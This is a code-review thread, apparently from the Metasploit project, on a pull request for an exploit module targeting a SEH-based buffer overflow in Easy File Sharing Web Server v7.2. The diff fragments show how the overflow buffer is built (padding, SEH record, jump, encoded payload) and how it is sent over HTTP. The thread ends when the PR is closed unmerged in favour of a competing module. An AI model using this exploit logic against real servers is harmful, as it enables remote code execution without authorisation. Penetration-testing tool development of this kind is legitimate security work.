### PR TITLE
Easy File Sharing Web Server v7.2 Remote SEH Based Overflow

### PR DESCRIPTION
**Pull request by cbgabriel-zz**

### CODE REVIEW

**Comment by cbgabriel** [comment]
Cleaned up some formatting

File: modules/exploits/windows/http/easy_file_share [hunk 1]
```diff
@@ -0,0 +1,111 @@
...
+        OptBool.new('SSL',[false, 'Use SSL', false])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/')
+    })
+    if res.to_s.include?('Server: Easy File Sharing Web Server v6.9')
```
Comment (void-in) [inline modules/exploits/windows/http/easy_file_share]: The description mentions v7.2. Here you are checking v6.9?

File: modules/exploits/windows/http/easy_file_share [hunk 2]
```diff
@@ -0,0 +1,111 @@
...
+        [
+          'superkojiman', # Original discovery
+          'Audit0r - https://twitter.com/Audit0rSA',  
+          'Chris Gabriel',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '106965' ],
+          [ 'CVE', ' 2014-3791' ],        
+          [ 'URL', 'https://www.exploit-db.com/exploits/33352/' ],
```
Comment (void-in) [inline modules/exploits/windows/http/easy_file_share]: Why the reference for v6.8 exploit? We can omit this line and only include the link for v7.2.

File: modules/exploits/windows/http/easy_file_share [hunk 3]
```diff
@@ -0,0 +1,111 @@
...
+        [
+          [ 'OSVDB', '106965' ],
+          [ 'CVE', ' 2014-3791' ],        
+          [ 'URL', 'https://www.exploit-db.com/exploits/33352/' ], 
+          [ 'URL', 'https://www.exploit-db.com/exploits/38526/' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process', #none/process/thread/seh
+          #'InitialAutoRunScript' => 'migrate -f',
```
Comment (void-in) [inline modules/exploits/windows/http/easy_file_share]: Remove both the comments `#none/process/thread/seh` and `InitialAutoRunScript => 'migrate -f`

File: modules/exploits/windows/http/easy_file_share [hunk 4]
```diff
@@ -0,0 +1,111 @@
...
+          ],
+        ],
+      'Privileged'  => false,
+      'DisclosureDate'  => 'Oct 12 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptBool.new('SSL',[false, 'Use SSL', false])
```
Comment (void-in) [inline modules/exploits/windows/http/easy_file_share]: SSL is false by default so no need to explicitly set it to false.

File: modules/exploits/windows/http/easy_file_share [hunk 5]
```diff
@@ -0,0 +1,111 @@
...
+    sploit  = rand_text(target['Offset'])  #junk
+    sploit += generate_seh_record(target.ret)
+    sploit += "\xEB\x76" # jmp to shellcode
+    sploit += rand_text(4183 - sploit.length)
+    sploit += "AAAA" # invalid address
+    sploit += payload.encoded
+    
+    print_status("#{peer} - Establishing session with target ...")
+    res = send_request_cgi({
+      'uri'    => normalize_uri('/changeuser.ghp'),
```
Comment (void-in) [inline modules/exploits/windows/http/easy_file_share]: A typo here. It should be changeuser.php

File: modules/exploits/windows/http/easy_file_share [hunk 6]
```diff
@@ -0,0 +1,111 @@
...
+      'method' => 'GET',
+      'headers' => {
+        'User-Agent' => 'Mozilla/4.0',
```
Comment (void-in) [inline modules/exploits/windows/http/easy_file_share]: If the user-agent string is not important for exploitation, remove it. HTTPClient select the default user-agent and is user configurable.

**Comment by wchen-r7** [comment]
Filename needs to be a *.rb

**Comment by cbgabriel** [comment]
Wei,

I'll look into if the older versions of the app are also exploitable via
SEH to avoid creating a separate module for this version.

**Comment by wchen-r7** [comment]
Note to all devs: There are multiple Easy File Sharing Web Server modules (pull requests). Please see: https://github.com/rapid7/metasploit-framework/pulls?utf8=%E2%9C%93&q=is%3Apr+is%3Aopen+Easy+File+Sharing+Web+Server

File: modules/exploits/windows/http/easy_file_share (hunk 1 above)
Comment (jvoisin) [inline modules/exploits/windows/http/easy_file_share]: It would be better to get the `whatsnew.txt` file, since it contains the complete changelog.

**Comment by wchen-r7** [comment]
Hello guys,

Since last October, we have received multiple exploits for Easy File Sharing. Specifically, these ones:

https://github.com/rapid7/metasploit-framework/pull/6113
https://github.com/rapid7/metasploit-framework/pull/6135
https://github.com/rapid7/metasploit-framework/pull/6181
https://github.com/rapid7/metasploit-framework/pull/6488

It was difficult to decide how to get them in Framework because they are so similar, no CVEs and no RCA, so we waited. We have not gained any momentum since #6488, so I decided to settle this by letting these four exploits compete: whichever is able to exploit against the latest (v7.2 on XP SP3), and the most reliable is the winner. And here's how it went down:

* #6113 exploits version 6.8, via a USERID parameter in the cookie. Crashes the tested v7.2.
* #6135 exploits version 7.2, also via a USERID parameter in the cookie. Crashes the tested 7.2.
* #6181 exploits version 6.9, also via a USERID parameter in the cookie. Crashes the tested 7.2.
* #6488 exploits version 7.2, via the GET path. Gets a session reliably.

We will merge #6488 to master. And we will close the rest - sorry to disappoint, but thanks for the PRs. We hope to see more contributions from you all.

**Pull request closed without merging**